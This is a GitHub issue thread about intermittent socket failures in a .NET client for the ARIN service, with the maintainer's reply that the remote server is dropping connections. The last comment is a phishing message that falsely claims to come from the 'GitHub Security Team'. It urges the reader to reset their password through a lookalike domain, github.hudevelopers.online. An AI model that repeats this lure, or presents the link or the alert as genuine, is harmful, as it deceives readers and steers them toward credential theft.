### ISSUE TITLE
Unable to read data from the transport

### ISSUE THREAD

**Issue by docfresh** [SteveSyfuhs/Arin.NET#3]
Recently, I've noticed occasionally failures with this error message: 'Unable to read data from the transport connection: An existing connection was forcibly closed by the remote host..'

stack trace    at System.Net.Sockets.Socket.AwaitableSocketAsyncEventArgs.ThrowException(SocketError error, CancellationToken cancellationToken)

on ArinClient.cs line 36.  response is null

![image](https://user-images.githubusercontent.com/8064022/124174023-7724eb80-da71-11eb-8c90-656e5db85883.png)

**Comment by SteveSyfuhs** [comment]
That's the ARIN server not accepting the socket connection. Not a whole lot I can do about it.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
